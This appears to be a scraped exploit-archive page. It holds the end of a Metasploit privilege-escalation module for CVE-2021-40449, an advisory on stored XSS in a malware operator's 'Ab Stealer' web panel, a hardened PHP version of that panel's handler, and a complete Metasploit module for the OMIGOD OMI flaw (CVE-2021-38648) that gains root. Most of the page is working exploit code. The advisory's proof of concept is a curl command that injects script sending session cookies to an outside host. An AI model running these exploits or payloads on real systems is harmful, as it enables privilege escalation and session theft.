'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_OS_RESTARTS, ],<br /> 'Reliability' => [ 
REPEATABLE_SESSION, ],<br /> 'SideEffects' => []<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> sysinfo_value = sysinfo['OS']<br /><br /> if sysinfo_value !~ /windows/i<br /> # Non-Windows systems are definitely not affected.<br /> return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')<br /> end<br /><br /> build_num_raw = cmd_exec('cmd.exe /c ver')<br /> build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)<br /> if build_num.nil?<br /> print_error("Couldn't retrieve the target's build number!")<br /> else<br /> build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]<br /> print_status("Target's build number: #{build_num}")<br /> end<br /><br /> # see https://docs.microsoft.com/en-us/windows/release-information/<br /> unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1809|1903)/<br /> return CheckCode::Safe('Target is not running a vulnerable version of Windows!')<br /> end<br /><br /> build_num_gemversion = Rex::Version.new(build_num)<br /><br /> # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/<br /> if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11<br /> return CheckCode::Appears('Vulnerable Windows 11 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022<br /> return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2<br /> return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1<br /> return 
CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2<br /> return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1<br /> return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909<br /> return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903<br /> return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809<br /> return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803<br /> return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709<br /> return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703<br /> return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')<br /> elsif (build_num_gemversion >= 
Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607<br /> return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511<br /> return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507<br /> return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2<br /> return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012<br /> return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2<br /> return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')<br /> elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2<br /> return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')<br /> else<br /> return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')<br /> end<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br 
/><br /> if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')<br /> elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')<br /> elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64<br /> fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')<br /> end<br /><br /> encoded_payload = payload.encoded<br /> execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),<br /> [encoded_payload.length].pack('I<') + encoded_payload<br /> )<br /><br /> print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/9e44c10307aa8194753896ecf8102167.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ab Stealer Web Panel<br />Vulnerability: Unauthenticated Remote Persistent XSS<br />Description: The "Ab Stealer" web panel by KingDomSc for "AbBuild v.1.0.exe" is used to browse victim information ("Get All Victims Passwords, With One Click"). Third-party attackers who can reach the "Ab Stealer" server can write plaintext files to Panel\psw, injecting persistent cross-site scripting payloads without authentication. The XSS payloads execute whenever an "Ab Stealer" admin visits the web UI or clicks an infected link to view victim information. HTTP POST requests to POST.php write files "ip-1.txt", "ip-2.txt", etc. to the "psw" directory. These text files normally hold victim information (IP, computer name, country, date); since the PHP code performs no validation, malicious client-side JavaScript can be stored in them instead. This can result in data theft and disclosure of the PHPSESSID token or the geolocation of a logged-on user of the "Ab Stealer" web panel.<br /><br />POST.php selects its action with the "online" GET parameter and then writes the POST body fields, unsanitized, to files in its "psw" web directory.<br /><br />E.g.<br /><br />if (isset($_GET['online'])) {<br />    $path = 'psw';<br />    $files = array_diff(scandir($path), array('.', '..'));<br />    $CountFiles = count($files) + 1;<br />    $FileName = 'ip-'.$CountFiles.'.txt';<br />    $ip = $_POST['ip'];<br />    $computername = $_POST['computername'];<br />    $installdate = $_POST['installdate'];<br />    $country = $_POST['country'];<br />    $FFD = '{"ip":"'.$ip.'","computername":"'.$computername.'","country":"'.$country.'","date":"'.$installdate.'"}';<br />    $myfile = fopen('psw/'.$FileName, "w") or die("Unable to open file!");<br />    fwrite($myfile, $FFD);<br />    fclose($myfile);<br />    echo $CountFiles;<br />}<br /><br />Moreover, Panel.php does not use htmlspecialchars or htmlentities to escape output when echoing this untrusted, user-supplied data.<br /><br />Type: WebUI<br />MD5: 9e44c10307aa8194753896ecf8102167 (AbBuild v.1.0.exe)<br />MD5: 017925cad9c4eb2c102053cbba04129e (index.php)<br />Vuln ID: MVID-2022-0450<br />Disclosure: 01/15/2022<br /><br /><br />Exploit/PoC:<br />1) Create the psw directory, as the Panel setup does not create it when installing<br /><br />2) curl.exe http://AB_STEALER_SERVER/Panel/POST.php?online=1 --data "ip=x.x.x.x&computername='%3Cscript%3Ewindow.open('http://malvuln.com/stealsess.php?tok='%2bdocument.cookie)%3C/script%3E&installdate=&country=HELL"<br /><br />3) Visit the Ab Stealer web UI and/or click an infected link.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
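The same POST.php handler in hardened form, as an added example that is not part of the advisory or of the panel's own code: each POST field is checked against an allowlist before anything reaches disk, the record is serialised with json_encode instead of string concatenation, and a panel-side helper escapes stored values with htmlspecialchars before they are echoed. It assumes the same ?online=1 trigger and psw/ layout as the quoted code; the function names are the example's own, and authenticating the reporting client (which the original also lacks) is outside this snippet.

```php
<?php
// Added example, not the panel's code: a hardened version of the quoted POST.php handler.
const PSW_DIR = __DIR__ . '/psw';

function cleanField(array $post, string $key): string
{
    $value = $post[$key] ?? '';
    // Non-strings (computername[]=x) and anything outside a conservative character
    // set, including < > " ' &, are rejected rather than written to disk.
    if (!is_string($value) || !preg_match('/^[A-Za-z0-9 ._:-]{0,64}\z/', $value)) {
        throw new InvalidArgumentException("$key is not a string or contains disallowed characters");
    }
    return $value;
}

function storeRecord(array $post): int
{
    $ip = filter_var($post['ip'] ?? '', FILTER_VALIDATE_IP);
    if ($ip === false) {
        throw new InvalidArgumentException('invalid ip');
    }
    $record = [
        'ip'           => $ip,
        'computername' => cleanField($post, 'computername'),
        'country'      => cleanField($post, 'country'),
        'date'         => cleanField($post, 'installdate'),
    ];
    if (!is_dir(PSW_DIR) && !mkdir(PSW_DIR, 0750, true)) {
        throw new RuntimeException('cannot create storage directory');
    }
    // json_encode yields well-formed JSON; the original string concatenation did not.
    $count = count(array_diff(scandir(PSW_DIR), ['.', '..'])) + 1;
    file_put_contents(PSW_DIR . "/ip-$count.txt", json_encode($record, JSON_THROW_ON_ERROR), LOCK_EX);
    return $count;
}

// Output side (Panel.php): escape every stored field before echoing it into HTML.
function renderCell(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if (isset($_GET['online'])) {
    try {
        echo storeRecord($_POST);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo 'rejected';
    }
}
```

With this in place the advisory's step 2 request is answered with HTTP 400 and nothing is written, and any legacy record that does contain markup is rendered inert by renderCell().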
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br />  Rank = ExcellentRanking<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br />  include Msf::Post::File<br />  include Msf::Post::Process<br />  include Msf::Exploit::EXE<br />  include Msf::Exploit::FileDropper<br /><br />  DEFAULT_SERVER_BIN_PATH = '/opt/omi/bin/omiserver'.freeze<br />  DEFAULT_SOCKET_PATH = '/var/opt/omi/run/omiserver.sock'.freeze<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Microsoft OMI Management Interface Authentication Bypass',<br />        'Description' => %q{<br />          By removing the authentication exchange, an attacker can issue requests to the local OMI management socket<br />          that will cause it to execute an operating system command as the root user. This vulnerability was patched in<br />          OMI version 1.6.8-1 (released September 8th 2021).<br />        },<br />        'References' => [<br />          ['CVE', '2021-38648'],<br />          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648'],<br />          ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],<br />          ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']<br />        ],<br />        'Author' => [<br />          'Nir Ohfeld', # vulnerability discovery & research<br />          'Shir Tamari', # vulnerability discovery & research<br />          'Spencer McIntyre' # metasploit module<br />        ],<br />        'DisclosureDate' => '2021-09-14',<br />        'License' => MSF_LICENSE,<br />        'Platform' => ['linux', 'unix'],<br />        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br />        'SessionTypes' => ['shell', 'meterpreter'],<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'Payload' => { 'DisableNops' => true, 'Space' => 256 }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X86, ARCH_X64],<br />              'Type' => :linux_dropper<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 1,<br />        'DefaultOptions' => {<br />          'MeterpreterTryToFork' => true<br />        },<br />        'Notes' => {<br />          'AKA' => ['OMIGOD'],<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br /><br />    register_advanced_options([<br />      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]),<br />      OptString.new('SocketPath', [ false, 'The path to the OMI server socket.', '' ])<br />    ])<br />  end<br /><br />  def check<br />    pid = pidof('omiserver').first<br />    return CheckCode::Safe('The omiserver process was not found.') if pid.nil?<br /><br />    omiserver_bin = read_file("/proc/#{pid}/cmdline").split("\x00", 2).first<br />    omiserver_bin = DEFAULT_SERVER_BIN_PATH if omiserver_bin.blank? && file?(DEFAULT_SERVER_BIN_PATH)<br />    return CheckCode::Unknown('Failed to find the omiserver binary path.') if omiserver_bin.blank?<br /><br />    vprint_status("Found #{omiserver_bin} running in PID: #{pid}")<br />    if cmd_exec("#{omiserver_bin} --version") =~ /\sOMI-(\d+(\.\d+){2,3}(-\d+)?)\s/<br />      version = Regexp.last_match(1)<br />    else<br />      return CheckCode::Unknown('Failed to identify the version of the omiserver binary.')<br />    end<br /><br />    return CheckCode::Safe("Version #{version} is not affected.") if Rex::Version.new(version) > Rex::Version.new('1.6.8-0')<br /><br />    CheckCode::Appears("Version #{version} is affected.")<br />  end<br /><br />  def upload(path, data)<br />    print_status "Writing '#{path}' (#{data.size} bytes) ..."<br />    write_file path, data<br />  ensure<br />    register_file_for_cleanup(path)<br />  end<br /><br />  def find_exec_program<br />    %w[python python3 python2].select(&method(:command_exists?)).first<br />  end<br /><br />  def get_socket_path<br />    socket_path = datastore['SocketPath']<br />    return socket_path unless socket_path.blank?<br /><br />    pid = pidof('omiserver').first<br />    fail_with(Failure::NotFound, 'The omiserver pid was not found.') if pid.nil?<br /><br />    if read_file("/proc/#{pid}/net/unix") =~ %r{\s(/(\S+)server\.sock)$}<br />      socket_path = Regexp.last_match(1)<br />    else<br />      begin<br />        socket_path = DEFAULT_SOCKET_PATH if stat(DEFAULT_SOCKET_PATH).socket?<br />      rescue StandardError # rubocop:disable Lint/SuppressedException<br />      end<br />    end<br /><br />    fail_with(Failure::NotFound, 'The socket path could not be found.') if socket_path.blank?<br /><br />    vprint_status("Socket path: #{socket_path}")<br />    socket_path<br />  end<br /><br />  def exploit<br />    python_binary = find_exec_program<br />    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary<br /><br />    vprint_status("Using '#{python_binary}' to run the exploit")<br />    socket_path = get_socket_path<br />    path = datastore['WritableDir']<br />    python_script = rand_text_alphanumeric(5..10) + '.py'<br /><br />    case target['Type']<br />    when :unix_cmd<br />      root_cmd = payload.encoded<br />    when :linux_dropper<br />      unless path.start_with?('/')<br />        # the command will be executed from a different working directory so use an absolute path<br />        fail_with(Failure::BadConfig, 'The payload path must be an absolute path.')<br />      end<br /><br />      payload_path = "#{path}/#{rand_text_alphanumeric(5..10)}"<br />      if payload_path.length > 256<br />        # the Python exploit uses a hard-coded exchange that only allows up to 256 characters to be included in the<br />        # command that is executed<br />        fail_with(Failure::BadConfig, 'The payload path is too long (>256 characters).')<br />      end<br /><br />      upload(payload_path, generate_payload_exe)<br />      cmd_exec("chmod +x '#{payload_path}'")<br />      root_cmd = payload_path<br />    end<br /><br />    upload("#{path}/#{python_script}", exploit_data('CVE-2021-38648', 'cve_2021_38648.py'))<br />    cmd = "#{python_binary} #{path}/#{python_script} -s '#{socket_path}' '#{root_cmd}'"<br />    vprint_status("Running #{cmd}")<br />    output = cmd_exec(cmd)<br />    vprint_line(output) unless output.blank?<br />  end<br />end<br /></code></pre>